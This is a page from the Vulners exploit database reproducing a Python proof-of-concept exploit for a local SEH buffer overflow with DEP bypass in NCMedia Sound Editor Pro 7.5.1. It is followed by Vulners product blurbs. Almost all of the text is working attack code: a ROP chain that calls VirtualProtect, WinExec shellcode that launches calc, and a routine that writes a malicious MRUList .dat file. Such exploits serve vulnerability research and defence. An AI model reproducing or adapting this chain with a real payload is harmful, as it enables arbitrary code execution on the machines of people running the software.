Vulners
Lucene search
NCMedia Sound Editor Pro 7.5.1 - Local Overflow (SEH + DEP Bypass)
#!/usr/bin/python
#---------------------------------------------------------------------------#
# Exploit: NCMedia Sound Editor Pro v7.5.1 SEH&DEP #
# Author: b33f - http://www.fuzzysecurity.com/ #
# OS: Windows 7 Pro SP1 (probably universal across 32-bit) #
# POC - Julien Ahrens XP SP3: http://www.exploit-db.com/exploits/21331/ #
# Software: http://www.soundeditorpro.com/ #
# HOWTO: put the *.dat file in [USER]\Roaming\Sound Editor Pro\ #
# open -> click "File" menu -> calc ;)) #
#---------------------------------------------------------------------------#
# Curiously enough, the only thing that went through the mind of the #
# ROP-Chain as it was executed was "Oh no, not again"! #
#---------------------------------------------------------------------------#
import sys, socket, struct
file="MRUList201202.dat"
#--------------------------------------------------------------------------------------------------------------#
# Semi-Universal ROP chain based entirely on MSVCR70.dll which comes packaged with "NCMedia Sound Editor"... #
#--------------------------------------------------------------------------------------------------------------#
rop = struct.pack('<L',0x7c0126bc) # XCHG EAX,EBP # ADD AL,7C # RETN \
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN |
rop += struct.pack('<L',0x7C0390FD) # VirtualProtect() -> ESI=0 EBP=0 -> 7c039138(VP)-3B | MOV VP -> ESI
rop += struct.pack('<L',0x7c023a4f) # ADD ESI,DWORD PTR DS:[EAX+EBP+3B] # RETN /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN \
rop += struct.pack('<L',0xFFBF90EF) # NEG is -> 0x00406f11 : jmp esp [SoundEditorPro.exe] | JMP ESP -> EBP
rop += struct.pack('<L',0x7c0167cd) # NEG EAX # RETN [MSVCR70.dll] |
rop += struct.pack('<L',0x7c0126b7) # XCHG EAX,EBP # ADD AL,7C # RETN /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN \
rop += struct.pack('<L',0xFFFFFDFF) # Neg is 201-HEX (513-bytes) | Executable Size -> EBX
rop += struct.pack('<L',0x7c0167cd) # NEG EAX # RETN |
rop += struct.pack('<L',0x7c01561c) # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c026484) # POP EDI # RETN \ ROP-NOP -> EDI
rop += struct.pack('<L',0x7c034e02) # ROP-NOP /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN \
rop += struct.pack('<L',0xFFFFFFC0) # NEG is 0x40 | newProtect -> EDX
rop += struct.pack('<L',0x7c0167cd) # NEG EAX # RETN |
rop += struct.pack('<L',0x7c026dc4) # MOV EDX,EAX # INC ECX # MOVZX EAX,BYTE PTR DS:[ECX] # ADD EAX,EDX # RETN /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c034e01) # POP ECX # RETN \ RW lpOldProtect -> ECX
rop += struct.pack('<L',0x7c049001) # lpOldProtect /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN \ NOP padding -> EAX
rop += struct.pack('<L',0x90909090) # NOP /
#--------------------------------------------------------------------------------------------------------------#
rop += struct.pack('<L',0x7c0126b6) # PUSHAD # XCHG EAX,EBP # ADD AL,7C # RETN | PUSHAD -> pwnd!!
#--------------------------------------------------------------------------------------------------------------#
#----------------------------------
# Greets to SkyLined, you do great work with shellcode!!
#----------------------------------
calc = (
"\x31\xD2" #
"\x52" #
"\x68\x63\x61\x6C\x63" # Stack has arguments for
"\x89\xE6" # WinExec -> calc
"\x52" #
"\x56" ########
"\x64\x8B\x72\x30" #
"\x8B\x76\x0C" #
"\x8B\x76\x0C" # Found Kernel32
"\xAD" # base address
"\x8B\x30" #
"\x8B\x7E\x18" ########
"\x8B\x5F\x3C" # Found export table offset
"\x8B\x5C\x1F\x78" ########
"\x8B\x74\x1F\x20" # Found export names table
"\x01\xFE" ########
"\x8B\x4C\x1F\x24" # Found export ordinals table
"\x01\xF9" ########
"\x42" #
"\xAD" # Found WinExec ordinal
"\x81\x3C\x07\x57\x69\x6E\x45" #
"\x75\xF5" ########
"\x0F\xB7\x54\x51\xFE" #
"\x8B\x74\x1F\x1C" #
"\x01\xFE" # Pop calc ;))
"\x03\x3C\x96" #
"\xFF\xD7") #
#----------------------------------
# badchars -> '\x00\x0d\x0a'
# 0x0040e02a {pivot 1092} # ADD ESP,444 # RETN [SoundEditorPro.exe]
# ROP-NOP Slide 0x7c034e02 [MSVCR70.dll]
#----------------------------------
b00m = "\x90"*10 + calc
poc = "\x02\x4E\x03\x7C"*61 + rop + b00m + "\x41"*(3880-len(rop + b00m)) + "\x2A\xE0\x40\x00"
try:
print "[*] Creating exploit file...\n"
writeFile = open (file, "w")
writeFile.write( poc )
writeFile.close()
print "[*] File successfully created!"
except:
print "[!] Error while creating file!"Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Oct 2012 00:00Current
7.4High risk
Vulners AI Score7.4